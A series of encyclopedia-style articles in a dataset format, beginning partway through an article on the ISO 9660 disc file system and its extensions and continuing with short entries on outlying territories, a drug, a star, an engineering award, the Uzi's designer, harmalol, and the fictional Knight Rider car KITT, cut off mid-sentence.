allowed characters (support for lowercase, etc.) UNIX-style file modes, user ids and group ids, and file timestamps Support for Symbolic links and device files Deeper directory hierarchy (more than 8 levels) Efficient storage of sparse files The RRIP extensions are built upon SUSP, defining additional tags for support of POSIX semantics, along with the format and meaning of the corresponding system use fields: RR: Rock Ridge extensions in-use indicator (note: dropped from standard after version 1.09) PX: POSIX file attributes PN: POSIX device numbers SL: symbolic link NM: alternate name CL: child link PL: parent link RE: relocated directory TF: time stamp SF: sparse file data Amiga Rock Ridge is similar to RRIP, except it provides additional properties used by AmigaOS. It too is built on the SUSP standard by defining an "AS"-tagged system use field. Thus both Amiga Rock Ridge and the POSIX RRIP may be used simultaneously on the same volume. Some of the specific properties supported by this extension are the additional Amiga-bits for files. There is support for attribute "P" that stands for "pure" bit (indicating re-entrant command) and attribute "S" for script bit (indicating batch file). This includes the protection flags plus an optional comment field. These extensions were introduced by Angela Schmidt with the help of Andrew Young, the primary author of the Rock Ridge Interchange Protocol and System Use Sharing Protocol. The first publicly available software to master a CD-ROM with Amiga extensions was MakeCD, an Amiga software which Angela Schmidt developed together with Patrick Ohly. El Torito El Torito is an extension designed to allow booting a computer from a CD-ROM. It was announced in November 1994 and first issued in January 1995 as a joint proposal by IBM and BIOS manufacturer Phoenix Technologies. According to legend, the El Torito CD/DVD extension to ISO 9660 got its name because its design originated in an El Torito restaurant in Irvine, California (). The initial two authors were Curtis Stevens, of Phoenix Technologies, and Stan Merkin, of IBM. A 32-bit PC BIOS will search for boot code on an ISO 9660 CD-ROM. The standard allows for booting in two different modes. Either in hard disk emulation when the boot information can be accessed directly from the CD media, or in floppy emulation mode where the boot information is stored in an image file of a floppy disk, which is loaded from the CD and then behaves as a virtual floppy disk. This is useful for computers that were designed to boot only from a floppy drive. For modern computers the "no emulation" mode is generally the more reliable method. The BIOS will assign a BIOS drive number to the CD drive. The drive number (for INT 13H) assigned is any of 80hex (hard disk emulation), 00hex (floppy disk emulation) or an arbitrary number if the BIOS should not provide emulation. Emulation is useful for booting older operating systems from a CD, by making it appear to them as if they were booted from a hard or floppy disk. UEFI systems also accept El Torito records, as platform 0xEF. The record is expected to be a disk image containing a FAT filesystem, the filesystem being an EFI System Partition containing the usual directory. The image should be marked for "no emulation", though it does not actually work like the BIOS "no emulation" mode, in which the BIOS would load the image in memory and execute the code from there. El Torito can also be used to produce CDs which can boot up Linux operating systems, by including the GRUB bootloader on the CD and following the Multiboot Specification. While the El Torito spec alludes to a "Mac" platform ID, PowerPC-based Apple Macintosh computers don't use it. Joliet Joliet is an extension specified and endorsed by Microsoft and has been supported by all versions of its Windows operating system since Windows 95 and Windows NT 4.0. Its primary focus is the relaxation of the filename restrictions inherent with full ISO 9660 compliance. Joliet accomplishes this by supplying an additional set of filenames that are encoded in UCS-2BE (UTF-16BE in practice since Windows 2000). These filenames are stored in a special supplementary volume descriptor, that is safely ignored by ISO 9660-compliant software, thus preserving backward compatibility. The specification only allows filenames to be up to 64 Unicode characters in length. However, the documentation for mkisofs states filenames up to 103 characters in length do not appear to cause problems. Microsoft has documented it "can use up to 110 characters." The difference lies in whether CDXA extension space is used. Joliet allows Unicode characters to be used for all text fields, which includes file names and the volume name. A "Secondary" volume descriptor with type 2 contains the same information as the Primary one (sector 16 offset 40 bytes), but in UCS-2BE in sector 17, offset 40 bytes. As a result of this, the volume name is limited to 16 characters. Many current PC operating systems are able to read Joliet-formatted media, thus allowing exchange of files between those operating systems even if non-Roman characters are involved (such as Arabic, Japanese or Cyrillic), which was formerly not possible with plain ISO 9660-formatted media. Operating systems which can read Joliet media include: Microsoft Windows; Microsoft recommends the use of the Joliet extension for developers targeting Windows. Linux macOS FreeBSD OpenSolaris Haiku AmigaOS RISC OS Romeo Romeo was developed by Adaptec and allows the use of long filenames up to 128 characters, written directly into the primary volume descriptor using the current code page. This format is built around the workings of Windows 9x and Windows NT "CDFS" drivers. When a Windows installation of a different language opens a Romeo disk, the lack of code page indication will cause non-ASCII characters in file names to become Mojibake. For example, "ü" may become "³". A different OS may encounter a similar problem or refuse to recognize these noncompliant names outright. The same code page problem technically exists in standard ISO 9660, which allows open interpretation of the supplemental and enhanced volume descriptors to any character encoding subject to agreement. However, the primary volume descriptor is guaranteed to be a small subset of ASCII. Apple extensions Apple Computer authored a set of extensions that add ProDOS or HFS/HFS+ (the primary contemporary file systems for the classic Mac OS) properties to the filesystem. Some of the additional metadata properties include: Date of last backup File type Creator code Flags and data for display Reference to a resource fork In order to allow non-Macintosh systems to access Macintosh files on CD-ROMs, Apple chose to use an extension of the standard ISO 9660 format. Most of the data, other than the Apple specific metadata, remains visible to operating systems that are able to read ISO 9660. Other extensions For operating systems which do not support any extensions, a name translation file TRANS.TBL must be used. The TRANS.TBL file is a plain ASCII text file. Each line contains three fields, separated by an arbitrary amount of whitespace: The file type ("F" for file or "D" for directory); The ISO 9660 filename (including the usually hidden ";1" for files); and The extended filename, which may contain spaces. Most implementations that create TRANS.TBL files put a single space between the file type and ISO 9660 name and some arbitrary number of tabs between the ISO 9660 filename and the extended filename. Native support for using TRANS.TBL still exists in many ISO 9660 implementations, particularly those related to Unix. However, it has long since been superseded by other extensions, and modern utilities that create ISO 9660 images either cannot create TRANS.TBL files at all, or no longer create them unless explicitly requested by the user. Since a TRANS.TBL file has no special identification other than its name, it can also be created separately and included in the directory before filesystem creation. The ISO 13490 standard is an extension to the ISO 9660 format that adds support for multiple sessions on a disc. Since ISO 9660 is by design a read-only, pre-mastered file system, all the data has to be written in one go or "session" to the medium. Once written, there is no provision for altering the stored content. ISO 13490 was created to allow adding more files to a writeable disc such as CD-R in multiple sessions. The ISO 13346/ECMA-167 standard was designed in conjunction to the ISO 13490 standard. This new format addresses most of the shortcomings of ISO 9660, and a subset of it evolved into the Universal Disk Format (UDF), which was adopted for DVDs. The volume descriptor table retains the ISO9660 layout, but the identifier has been updated. Disc images Optical disc images are a common way to electronically transfer the contents of CD-ROMs. They often have the filename extension .iso (.iso9660 is less common, but also in use) and are commonly referred to as "ISOs". Platforms Most operating systems support reading of ISO 9660 formatted discs, and most new versions support the extensions such as Rock Ridge and Joliet. Operating systems that do not support the extensions usually show the basic (non-extended) features of a plain ISO 9660 disc. Operating systems that support ISO 9660 and its extensions include the following: DOS: access with extensions, such as MSCDEX.EXE (Microsoft CDROM Extension), NWCDEX.EXE or CORELCDX.EXE Microsoft Windows 95, Windows 98, Windows ME: can read ISO 9660 Level 1, 2, 3, and Joliet Microsoft Windows NT 4.0, Windows 2000, Windows XP, and newer Windows versions, can read ISO 9660 Level 1, 2, 3, Joliet, and ISO 9660:1999. Windows 7 may also mistake UDF format for CDFS. for more information see UDF. Linux and BSD: ISO 9660 Level 1, 2, 3, Joliet, Rock Ridge, and ISO 9660:1999 Apple GS/OS: ISO Level 1 and 2 support via the HS.FST File System Translator. Classic Mac OS 7 to 9: ISO Level 1, 2. Optional free software supports Rock Ridge and Joliet (including ISO Level 3): Joke Ridge and Joliet Volume Access. macOS (all versions): ISO Level 1, 2, Joliet and Rock Ridge Extensions. Level 3 is not currently supported, although users have been able to mount these discs AmigaOS supports the "AS" extensions (which preserve the Amiga protection bits and file comments) QNX ULTRIX OS/2, eComStation and ArcaOS BeOS, Zeta and Haiku OpenVMS supports only ISO 9660 Interchange levels 1–3, with no extensions RISC OS support for optical media written on a PC is patchy. Most CD-Rs/RWs work perfectly, however DVD+-Rs/RWs/RAMs are entirely hit and miss running RISC OS 4.02, RISC OS 4.39 and RISC OS 6.20 See also Comparison of disc image software Disk image emulator List of ISO standards Hybrid CD ISO/IEC JTC 1/SC 23 References Further reading External links This is the ECMA release of the ISO 9660:1988 standard, available as a free download ISOLINUX source code (see isolinux.asm line 294 onward) (see int 13h in interrupt.b, esp. functions 4a to 4d) , discusses shortcomings of the standard US Patent 5758352 - Common name space for long and short filenames Amiga APIs Apple Inc. file systems Compact disc Disk file systems Ecma standards 09660 Optical computer storage Optical disc authoring Windows disk file systems
ISO 9660
Technology
6,165
13,535,882
https://en.wikipedia.org/wiki/Outlying%20territory
An outlying territory or separate area is a state territory geographically separated from its parent territory and lies beyond Exclusive Economic Zone of its parent territory. The tables below are lists of outlying territories which are marked by distinct, non-contiguous maritime boundaries or land boundaries: Outlying geographical regions Outlying territories outside the continent Outlying uninhabited dependent territories Outlying dependent territories and areas of special sovereignty Notes 1. Enclaves are not included. 2. Disputed outlying territories in the Spratly Islands are not included. See also List of sovereign states List of dependent territories External links Maritime boundaries Countries’ EEZ Wiktionary-outlying A European outlying territory Map of Spratly Islands Borders Dependent territories
Outlying territory
Physics
133
74,735,914
https://en.wikipedia.org/wiki/TM5441
TM5441 is a drug which acts as an inhibitor of the serpin protein plasminogen activator inhibitor-1 (PAI-1). By inhibiting PAI-1, it increases activity of the enzymes tissue plasminogen activator and urokinase, which are involved in the blood clotting cascade. It has been researched for conditions such as hepatic steatosis and diabetic nephropathy, and while it has not been developed for medical use, it is widely used in scientific research. References Chloroarenes Benzoic acids 3-Furyl compounds Anilides Ethers
TM5441
Chemistry
136
2,898,697
https://en.wikipedia.org/wiki/Tau%20Aurigae
Tau Aurigae, Latinized from τ Aurigae, is a star in the northern constellation Auriga. It is visible to the naked eye with an apparent visual magnitude of 4.505, and is approximately distant from Earth. Tau Aurigae is an evolved giant star with a stellar classification of G8 III. It has expanded to 11 times the radius of the Sun and shines with 63 times the Sun's luminosity. This energy is radiated into outer space from the outer atmosphere at an effective temperature of 4,887. This heat gives it the yellow-hued glow of a G-type star. References External links HR 1995 CCDM J05492+3911 Image Tau Aurigae 038656 027483 Aurigae, Tau Auriga G-type giants Aurigae, 29 1995 BD+39 1418
Tau Aurigae
Astronomy
188
12,953,377
https://en.wikipedia.org/wiki/IEEE%20Lotfi%20A.%20Zadeh%20Award%20for%20Emerging%20Technologies
The IEEE Lotfi A. Zadeh Award for Emerging Technologies (until 2020 IEEE Daniel E. Noble Award) is a Technical Field Award of the IEEE for contributions to emerging technologies. The award is named after the US-Azerbaijani mathematician Lotfi A. Zadeh. The award was established by the IEEE Board of Directors in 2000, replacing the prior IEEE Morris N. Liebmann Memorial Award. The award may be presented to an individual or a team of up to three people. Recipients receive a bronze medal, certificate and honorarium. Recipients 2020: Miroslav Micovic 2019: Thomas Kenny 2018: Rajiv Joshi 2017: Miguel A. L. Nicolelis 2016: Mark G. Allen (USA) 2015: Khalil Najafi 2014: Gabriel M. Rebeiz 2013: Jan P. Allebach 2012: Subramanian S. Iyer 2011: Mark L. Burgener 2011: Ronald E. Reedy (USA) 2010: Shinichi Abe 2010: Shoichi Sasaki 2010: Takehisa Yaegashi (Japan) 2009: Larry F. Weber (USA) 2008: James M. Daughton 2008: Stuart Parkin (UK) 2008: Saied Tehrani 2007: Stephen R. Forrest 2007: Richard H. Friend 2007: Ching W. Tang (USA) 2006: Carlos A. Paz de Araujo (Brazil) 2005: David L. Harame 2004: Larry J. Hornbeck 2003: 2002: Masataka Nakazawa 2001: Katsutoshi Izumi 2000 and earlier: See IEEE Morris N. Liebmann Memorial Award References External links IEEE Daniel E. Noble Award for Emerging Technologies List of recipients of the IEEE Daniel E. Noble Award for Emerging Technologies Daniel E. Noble Award
IEEE Lotfi A. Zadeh Award for Emerging Technologies
Technology
358
290,146
https://en.wikipedia.org/wiki/Uziel%20Gal
Uziel "Uzi" Gal (, born Gotthard Glas; 15 December 1923 – 7 September 2002) was a German-born Israeli firearm designer who invented and became the eponym of the Uzi submachine gun. Biography Gal was born in Weimar, Germany to Miele and Erich Glas. When the Nazis came to power in 1933, he first moved to the United Kingdom and later in 1936 to Kibbutz Yagur in the British Mandate of Palestine, where he changed his name to Uziel Gal. In 1943, he was arrested for illegally carrying a gun and was sentenced to six years in prison. However, he was pardoned and released in 1946 (serving less than half of his sentence). Gal began designing the Uzi submachine gun shortly after the founding of Israel and the 1948 Arab–Israeli War. In 1951, it was officially adopted by the Israel Defense Forces and was called the Uzi after its creator. Gal did not want the weapon to be named after him but his request was denied. In 1955, he was decorated with the Tzalash haRamatkal and in 1958, Gal was the first person to receive the Israel Security Award, presented to him by Prime Minister David Ben-Gurion for his work on the Uzi. Gal retired from the IDF in 1975, and moved to the United States the following year. He settled in Philadelphia so that his daughter, Tamar, who had serious brain damage, could receive extended medical treatment there. In the early 1980s, Gal assisted in the creation of the Ruger MP9 submachine gun. Gal also assisted film-actors like Linda Hamilton and Robert Patrick in their training to use automatic weapons in their movie roles. Gal continued his work as a firearms designer in the United States until his death from cancer in 2002. His body was flown back to Yagur for burial. References External links Uziel Gal biography by his son, Iddo Gal 1923 births 2002 deaths Weapon designers Weapon design Firearm designers Israeli military personnel Israeli colonels Israel Defense Prize recipients Deaths from cancer in Pennsylvania Recipients of British royal pardons Jewish emigrants from Nazi Germany to the United Kingdom Inmates of Acre Prison Jewish emigrants from Nazi Germany to Mandatory Palestine Israeli inventors Israeli emigrants to the United States Israeli people of German-Jewish descent People convicted of illegal possession of weapons
Uziel Gal
Engineering
476
5,107,070
https://en.wikipedia.org/wiki/Harmalol
Harmalol is a bioactive beta-carboline and a member of the harmala alkaloids. Legal status Australia Harmala alkaloids are considered Schedule 9 prohibited substances under the Poisons Standard (October 2015). A Schedule 9 substance is a substance which may be abused or misused, the manufacture, possession, sale or use of which should be prohibited by law except when required for medical or scientific research, or for analytical, teaching or training purposes with approval of Commonwealth and/or State or Territory Health Authorities. See also 9-Me-Bc DMT References Tryptamine alkaloids Beta-Carbolines
Harmalol
Chemistry
130
1,829,947
https://en.wikipedia.org/wiki/KITT
KITT or K.I.T.T. is the common name of two fictional characters from the action franchise Knight Rider. In both instances, KITT is an artificially intelligent electronic computer module in the body of a highly advanced, very mobile, robotic automobile. The original KITT is known as the Knight Industries Two Thousand, which appeared in the original TV series Knight Rider as a 1982 Pontiac Firebird Trans Am. The second KITT is known as the Knight Industries Three Thousand, which appeared first in the two-hour 2008 pilot film for a new Knight Rider TV series and then the new series itself, and appeared as a 2008–2009 Ford Shelby GT500KR. During filming, KITT was voiced by a script assistant, with voice actors recording KITT's dialog later. David Hasselhoff and original series voice actor William Daniels first met each other six months after the series began filming. KITT's nemesis is KARR, whose name is an acronym of Knight Automated Roving Robot. KARR was voiced first by Peter Cullen and later by Paul Frees in seasons one and three, respectively, of the NBC original TV series Knight Rider. A 1991 sequel film, Knight Rider 2000, is centered on KITT's original microprocessor unit transferred into the body of the vehicle intended to be his successor, the Knight Industries Four Thousand (Knight 4000), voiced by Carmen Argenziano and William Daniels. Val Kilmer voiced KITT in the 2008–2009 Knight Rider series. Knight Industries Two Thousand (KITT) In the original Knight Rider series, the character of KITT (Knight Industries Two Thousand) was physically embodied as a modified 1982 Pontiac Trans Am. KITT was designed by customizer Michael Scheffe. The convertible and super-pursuit KITTs were designed and built by George Barris. Development In the history of the television show, the first KITT, voiced by William Daniels, was said to have been designed by the late Wilton Knight, a brilliant but eccentric billionaire, who established the Foundation for Law and Government (FLAG) and its parent Knight Industries. The 2008 film implies that Charles Graiman, creator of the Knight Industries Three Thousand, also had a hand in designing the first KITT. An unknown number of KITT's systems were designed at Stanford University. KITT's total initial production cost was estimated at $11,400,000 in 1982 (Episode 5, "Just My Bill"). The 1991 movie Knight Rider 2000 saw the first KITT (Knight Industries Two Thousand) in pieces, and Michael Knight himself reviving the Knight 2000 microprocessor unit, which is eventually transferred into the body of the vehicle intended to be the original KITT's direct successor, the Knight 4000. The new vehicle was a modified 1991 Dodge Stealth, appearing similar to the Pontiac Banshee prototype. In the 1997–1998 spin-off series Team Knight Rider, KITT is employed as a shadow advisor. It is later revealed that "The Shadow" is actually a hologram run by KITT. In "Knight of the Living Dead", Graiman states a third KITT exists as a backup. When KITT is about to die, his memories are downloaded so the third KITT can use them. However, the third backup is never used. While both the 2008 film and the reboot series appear to be a revamp of the original series, they offer some continuity from the original. The "new" or "second" KITT (Knight Industries Three Thousand) is a different vehicle and microprocessor unit. In Knight Rider 2000, it is stated that most of the Knight 2000 parts had been sold off. However, Graiman's garage in the 2008 film shows a more complete collection of parts than in the boxes recovered by Michael Knight in Knight Rider 2000. The original Knight Industries Two Thousand is also shown in the pilot movie (although in pieces) in the scene where the garage of Charles Graiman (creator of the Knight Industries Three Thousand and implied co-designer of the original KITT) is searched by antagonists. A Trans-Am body (without its hood) is partially covered by a tarp, on which rests the rear spoiler. The famous KITT steering wheel (labelled "Knight Two Thousand") and "KNIGHT" license plate are also shown, along with numerous black muscle car body parts. When the camera shows a full scene of the garage, there are four other Knight two thousand cars being stored there. One has been taken apart, and 3 other complete cars. If the video is paused at the right moment, all 4 cars are visible. Features AI personality and communication According to the series, the original KITT's main cybernetic processor was first installed in a mainframe computer used by the US government in Washington, D.C. However, Wilton saw better use for "him" in the Foundation's crime-fighting crusade and eventually this AI system was installed in the vehicle. KITT is an advanced supercomputer on wheels. The "brain" of KITT is the Knight 2000 microprocessor, which is the centre of a "self-aware" cybernetic logic module. This allows KITT to think, learn, communicate and interact with humans. He is also capable of independent thought and action. He has an ego that is easy to bruise and displays a very sensitive, but kind and dryly humorous personality. According to Episode 55, "Dead of Knight", KITT has 1,000 megabits of memory with one nanosecond access time. According to Episode 65, "Ten Wheel Trouble", KITT's future capacity is unlimited. KITT's serial number is AD227529, as mentioned in Episode 31, "Soul Survivor". KITT's Voice (Anharmonic) Synthesizer (for speech) and Etymotic Equalizer (audio input) allow his logic module to speak and communicate. With it, KITT can also simulate other sounds. KITT's primary spoken language was English; however, by accessing his language module, he can speak fluently in Spanish, French and much more. The module can be adjusted, giving KITT different accents such as in Episode 82, "Out of the Woods", where KITT uses a "New York City" accent and called Michael "Micky". During the first season, KITT's "mouth" in the interior of the vehicle was indicated by a flashing red square. In episode 14 "Heart of Stone", this was changed to three sectioned vertical bars, as this design proved popular with fans as part of KARR. KITT can also project his voice as a loudspeaker or as a form of ventriloquism (First used in Episode 48, "Knight of the Drones, Pt. 2"). KITT has a hidden switch and setting dial under the dash that either completely shuts down his AI module or deactivates certain systems should the need arise. First used in Episode 17, "Chariot of Gold". He also has a function which can be activated in order to completely lock the AI from all the vehicle controls, such as preventing KITT from activating Auto Cruise. KITT is still able to protest such actions vocally. First used in Episode 8, "Trust Doesn't Rust". KITT is in constant contact with Michael via a comlink through a two-way communication wristwatch (a modified '80s LCD AM radio watch) Michael wore. The watch also has a micro camera and scanner that KITT can access to gather information. In an emergency, Michael can activate a secret homing beacon hidden inside a gold pendant he wears around his neck. The beacon sends a priority signal that can remotely activate KITT, even if KITT were deactivated, and override his programming so that he rushes to Michael's aid. Used in Episode 42, "A Good Knight's Work" and in "Knights of the Fast Lane". Scanning and microwave jamming KITT has a front-mounted scanner bar called the Anamorphic Equalizer. The device is a fibre-optic array of electronic eyes. The scanner can see in all visual wavelengths, as well as X-ray and infrared. Its infrared Tracking Scope can monitor the position of specific vehicles in the area within 10 miles. The scanner is also KITT's most vulnerable area. Occasionally, the bar can pulse in different patterns and sweep rapidly or very slowly. Glen A. Larson, the creator of both Knight Rider and Battlestar Galactica has stated that the scanner is a nod to the Battlestar Galactica characters, the Cylons, and even used the iconic Cylon eye scanner audio to that effect. He stated that the two shows have nothing else in common and to remove any fan speculation, stated in the Season One Knight Rider DVD audio-comments, that he simply reused the scanning light for KITT because he liked the effect. KITT also has an array of tiny audio and visual microscanners and sensors threaded throughout his interior and exterior which allows for the tracking of anything around the car. KITT can also "smell" via an atmospheric sampling device mounted in his front bumper. When scanning in Surveillance Mode: KITT could detect people and vehicles and track their movements and discern proximity. KITT could gather structural schematics of buildings, vehicles, or other devices and help Michael avoid potential danger when he was snooping. KITT could monitor radio transmissions and telephone communications within a location and trace those calls. KITT could tap into computer systems to monitor, or upload and download information as long as he could break the access codes. KITT's other sensors include: a medical scanner that includes an electrocardiograph (EKG). The medical scanner can monitor the vital signs of individuals and display them on his monitors. It can indicate such conditions as if they were injured, poisoned, undergoing stress or other emotional behavior (First used in Episode 1, "Knight of the Phoenix (Pt. 2)"); a Voice Stress Analyzer which can process spoken voices and determine if someone may be lying (First used in Episode 26, "Merchants of Death"); and a bomb sniffer module that can detect explosives within a few yards of the vehicle (First used in Episode 25, "Brother's Keeper"); KITT has a microwave jamming system that plays havoc on electrical systems. This lets him take control of electronic machines, allowing things like cheating at slot machines, breaking electronic locks, fouling security cameras, and withdrawing money from ATMs. KITT can also use microwaves to heat a vehicle's brake fluid, causing it to expand and thus apply the brakes of the car. In Episode 26, "Merchants of Death", the microwave system's power has been increased 3 times its normal strength, strong enough to bring down a helicopter at a limited distance. Engine and driving KITT is powered by the Knight Industries turbojet engine, with modified afterburners. and a computer controlled 8-speed turbo-drive transmission. This helps him do 0–60 mph in 2 seconds (1.37g), standing to quarter mile 4.286 seconds. Electromagnetic hyper-vacuum disc brakes: 14 foot (4.25 m) braking distance (70–0 mph – 112–0 km/h – 11.7g). KITT primarily uses hydrogen fuel. However, his complex fuel processor allows him to run on any combustible liquid, even regular gasoline. In one episode, KITT mentioned his fuel economy was at least 65 miles per gallon. However, when operating on fuels other than liquid hydrogen, KITT's fuel efficiency and power output may be lowered. Used in most episodes, KITT can employ a "turbo boost". This is a pair of rocket boosters mounted just behind the front tires. These lifted the car, allowing KITT to jump into the air and pass over obstacles in the road. Also, occasionally, Turbo Boost was used to allow KITT to accelerate to incredible speeds in excess of 200 mph (322 km/h). The boosters could fire forward or backward, although the backward booster was rarely used. In later seasons, a passive laser restraint system helped protect Michael and any passengers from the shock of sudden impacts and hard stopping. It is speculated that this is a primitive form of an inertial damping device. First used in Episode 47, "Knight of the Drones". KITT has four main driving modes: Normal cruise – On "Normal", Michael has control of the car. In an emergency, KITT can still take over and activate Auto Cruise mode. Auto cruise – KITT has an "Alpha Circuit" as part of his main control system, which allows the CPU to drive the car utilizing an advanced Auto Collision Avoidance system. KARR's Alpha Circuit was damaged due to being submerged in water for a time, which required him to have an operator to control his Turbo Boost function. Pursuit mode – "Pursuit" is used during high-speed driving and is a combination of manual and computer assisted operation. KITT could respond to road conditions faster than Michael's reflexes could; however, Michael was technically in control of the vehicle and KITT helped guide certain maneuvers. Silent mode – The feature dampens his engine noise and allows him to sneak around. First used in Episode 37, "White-Line Warriors". Other vehicle modes included: a two-wheel ski drive, which allowed KITT to "ski" (driving up on two wheels) on either left or right side (First used in Episode 1, "Knight of the Phoenix"); an aquatic synthesizer which allows KITT to hydroplane, effectively "driving" on water, using his wheels and turbo system for propulsion (First used in Episode 28, "Return to Cadiz"), but which was removed by the end of the episode because it was faulty; and a High Traction Drop Downs (HTDD) system which hydraulically raises KITT's chassis for better traction when driving off-road (First used in Episode 39, "Speed Demons"). Internal features Dashboard equipment KITT has two CRT video display monitors on his dash. KITT later only has one when his dash was redesigned by Bonnie for the show's third season. Michael can contact home base and communicate with Devon and others by way of a telephone comlink using KITT's video display. The video display is also used for the Graphic Translator system (which sketches likenesses from verbal input to create a Facial composite), as well as for scanning or analysis results. KITT can also print hard copies of data on a dashboard-mounted printer (First used in Episode 15, "The Topaz Connection"). KITT has an Ultraphonic Chemical Analyzer scanning tray which can analyze the chemical properties of various materials. It can even scan fingerprints and read ballistic information off bullets and compare these with a police database. The system can also analyze chemical information gathered from KITT's exterior sensors (First used in Episode 17, "Chariot of Gold"). KITT also has an in-dash entertainment system that can play music and video, and run various computer programs including arcade games. KITT can dispense money to Michael when he needed it (First used in Episode 59, "Knight by a Nose"). Driver compartment KITT has two front ejection seats, mostly used when Michael needed a boost to fire escapes or rooftops. First used in Episode 1, "Knight of the Phoenix (Pt. 1)". KITT can release oxygen into his driver compartment and provide air to passengers if he was ever submerged in water or buried in earth. This is also used to overcome the effects of certain drugs (First used in Episode 5, "Slammin' Sammy's Stunt Show Spectacular".) KITT could spray a gas into the driver compartment that could render an unwanted occupant unconscious. KITT could also expel all breathable air from the driver compartment; however, only KARR ever threatened to use it to harm someone. KITT used this to rid the compartment of smoke after bombs were detonated in his trunk. External features KITT is equipped with "Tri-Helical Plasteel 1000 MBS" (Molecular Bonded Shell) plating which protects him from almost all forms of conventional firearms and explosive devices. He can only be harmed by heavy artillery and rockets, and even then, the blast usually left most of his body intact and only damaged internal components. This makes KITT's body durable enough to act as a shield for explosives, ram through rigid barriers of strong material without suffering damage himself and sustain frequent long jumps on turbo boost with no fear for the vehicle's structural integrity being damaged upon landing. The shell also protected him from fire. However, it was vulnerable to electricity, as seen in the episode "Lost Knight" (season 3 episode 10), when a surge of electricity shorted out his memory. The shell was also vulnerable to some potent acids and, in episode 70 "Knight Of The Juggernaut", a formula was made (with knowledge of the shell's chemical base) to neutralize it completely. The shell offers little to almost no protection from lasers in certain episodes. The shell is a combination of three secret substances together referred to as the Knight Compound, developed by Wilton Knight, who entrusted parts of the formula to three separate people, who each know only two pieces of the formula. The shell provided a frame tolerance of 223,000 lb (111.5 tons) and a front and rear axle suspension load of 57,000 lb (28.5 tons). In the pilot, "Knight of the Phoenix", the shell is described as the panels of the car itself; in later episodes, especially from season two onward, the idea of the shell being applied to a base vehicle chemically is used. KITT is also protected by a thermal-resistant Pyroclastic lamination coating that can withstand sustained temperatures of up to 800 degrees Fahrenheit (426 °C). First used in Episode 32, "Ring of Fire". KITT can tint the windshield and windows to become opaque (First seen in Episode 14, "Give Me Liberty... or Give Me Death") and can also deflate and re-inflate his tires (First used in Episode #5 "Slammin' Sammy's Stunt Show Spectacular"). KITT's tires can produce traction spikes that allow KITT to overcome steep terrain. First seen in Episode 86 "Hills of Fire". KITT can automatically open and close his doors, windows, hood, trunk, and T-tops. He could also lock his doors to prevent unauthorized entry into his driver compartment. KITT can also rotate his "KNIGHT" license plate to reveal a fictitious one reading "KNI 667". Michael used this to evade police when an APB was placed on him. First used in Episode 25, "Brother's Keeper". KITT's headlights can flash red and blue as police lights and he has a siren. First used in Episode 38, "Race for Life". KITT is equipped with a parachute. First used in Episode 23, "Goliath Returns (Pt. 1)". KITT can launch magnesium flares, which can also be used to divert heat-seeking missiles fired at him. First used in Episode 26, "Merchants of Death". KITT has twice had installed a high-powered ultra-frequency modulated resonating laser, capable of burning through steel plating. First used in Episode 9, "Trust Doesn't Rust" and was used to try and destroy KARR by hitting KARR's only weak spot. Until the laser was calibrated, KITT could not fire it himself and it could only be fired by KITT's technician Bonnie. Also as pointed out in "Trust Doesn't Rust", if at that time, it was fired more than twice, it would drain KITT's batteries. Later in "Goliath part 2", KITT was installed a more user friendly laser power pack which KITT uses to disable the monstrous 18-wheeler. Equipment in or under the bumpers KITT has a hidden winch and grappling hook system. Most often the hook is connected by a strong cable, but a metal arm has also been seen. The grappling hook is first used in Episode 6, "Not a Drop to Drink"; the winch is first used in Episode 13, "Forget Me Not". Under the front bumper, there is an induction coil that can extend, and when it touches a metal object, KITT can remotely induce electrical voltage or current in that object. First used in "Knight of the Drones (Part I)" to electrify a fence in order to incapacitate two thugs without seriously harming them. From under the rear bumper, KITT can spray a jet of oil, creating an oil slick; or emit a plume of smoke, creating a smoke screen (both were first used in Episode 1, "Knight of the Phoenix"). KITT can also dispense a cloud of tear gas along with his smoke screen (First used in Episode 13, "Hearts of Stone"). There are flame throwers mounted under the bumpers. First used in Episode 2, "Deadly Maneuvers". KITT could put out small fires from a sprayer in his bumpers. Fourth season update During the first episode of the fourth season, "Knight of the Juggernaut, Part I", KITT's Molecular Bonded Shell is intentionally neutralized by a sprayed combination of chemicals, and KITT is nearly destroyed by the Juggernaut, a custom-designed armored vehicle. KITT is redesigned and is repaired and rebuilt in "Knight of the Juggernaut, Part II". One main feature of the redesign is that Super-Pursuit mode is added, consisting of improved rocket boosters for enhanced acceleration, retractable spoilers for aerodynamic stability, and movable air inlets for increased cooling. Super-Pursuit Mode provided a 40% boost in speed beyond the car's original top speed of 300 MPH. When Super-Pursuit mode is used at night some of the exterior and under the wheel arches glow red. This also included an emergency braking system which slows KITT down from Super-Pursuit speeds, by using a forward braking booster and air panels that pop out to create air friction. While KITT's initial roof was a T-top, the redesigned KITT has a convertible roof. Michael can bring the top down by pressing the "C" button on KITT's dash. F.L.A.G. Mobile Command Center KITT has access to a mobile "garage" called the F.L.A.G. Mobile Command Center, a semi-trailer truck owned by the Foundation. In most episodes, it is a GMC General. The trailer has an extendable ramp that drops down and allows KITT to drive inside even when the truck is in motion. The trailer is loaded with spare parts and equipment for KITT, and also has a computer lab where technicians Bonnie or April would work and conduct repairs and maintenance while in transit. In "KITTnap", KITT is kidnapped and Michael and RC3 use the tractor cab (which has been disconnected from the trailer) to go and find him. Screen-used cars A total of 23 KITT cars were made for use in filming the series, although speculation is that there were as many as 25. All except one of these cars survived until the show was axed; all except 5 of the remaining 22 cars were destroyed at the end of filming. This is because the series began with five brand new Pontiacs for the pilot presentation, and in 1982 a nearby train carrying new Pontiacs to dealerships derailed in California, and Universal Studios acquired these wrecked cars for a low price. The contract stipulated that the cars could not be sold again for private use because of the train damage, so they had to be crushed when Universal Studios no longer needed them. Of the five that escaped that fate: one stunt car (originally at the Universal theme park) was shipped to a theme park in Australia, for World Expo '88, in Brisbane, Queensland, but is now believed to be back in the US. Universal kept one 'hero' and one stunt car for use in the Entertainment Center display – the two originals have since been sold to a private collector in the US; another, a convertible, disappeared for a while before being sold to the former Cars of the Stars Motor Museum in Keswick, Cumbria, England This convertible was sold to the Dezer Collection, Orlando, Florida when Cars of the Stars closed. The fifth car is believed to be in private hands in the UK. Press releases regularly appear claiming 'original screen-used' cars are being sold. For example: on April 4, 2007, "one of the four KITT cars used in production of the television series" was reputedly being put up for sale for $149,995 by Johnny Verhoek of Kassabian Motors, Dublin, California. And a story in USA Today from December 2007 states that slain real estate developer and car aficionado, Andrew Kissel, was in possession of one of the surviving cars. Some reports say that Michael Jackson bought an original KITT and former NSYNC band member Joey Fatone also claims to have purchased one of these authentic original KITTs at auction. There have been more 'original' cars auctioned than were built in total for the show. The September 